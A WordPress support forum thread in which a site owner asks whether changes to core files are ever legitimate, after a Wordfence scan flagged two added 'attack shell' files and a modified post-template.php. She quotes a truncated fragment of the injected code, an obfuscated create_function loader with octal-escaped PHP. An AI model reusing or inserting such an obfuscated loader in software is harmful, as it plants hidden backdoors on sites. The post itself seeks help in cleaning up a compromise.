Support » Fixing WordPress » Core Files Modified or Added – Is this ever legitimate?

  • Resolved KristenSRTS



    I believe my site has been hacked, but there’s nothing obvious happening as far as I can see. I ran a scan (using the Wordfence plugin) and it found 3 issues. One is a modification to the post-template.php file; the other two are files within the core WordPress folders that are NOT part of the original installation. Before I go deleting things (I have backups, so hopefully nothing un-fixable will happen) I wanted to make sure that I’m understanding things correctly. Is there ever a time when a theme or plugins or any other “extra” WordPress thing adds to or modifies the core files legitimately?

    The files that had issues and the warnings about them are:
    wp-admin/includes/class-wp-theme-edit.php – “Appears to be an attack shell”
    wp-admin/css/options-meta.php – “Appears to be an attack shell” – both of these shells mention backdoor access
    wp-includes/post-template.php – Modified – on one line (167) there was an “applyfilter” added, then a bunch of stuff lower down (around line 686) starting with a note,
    `* Applies custom filter.
    * @since 0.71
    * $text string to apply the filter
    * @return string
    function applyfilter($text=null) {
    if($text) @ob_start();
    if(1){global $O10O1OO1O;$O10O1OO1O=create_function(‘$s,$k’,”\44\163\75\165\162\154\144\145\143\157\144\145\50\44\”`
    and it continues on like that with bunch more numbers, etc. and some other weird looking code or something. I don’t know anything about php files or really very much about any of this stuff. Any help would be appreciated.


Viewing 6 replies - 1 through 6 (of 6 total)
Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘Core Files Modified or Added – Is this ever legitimate?’ is closed to new replies.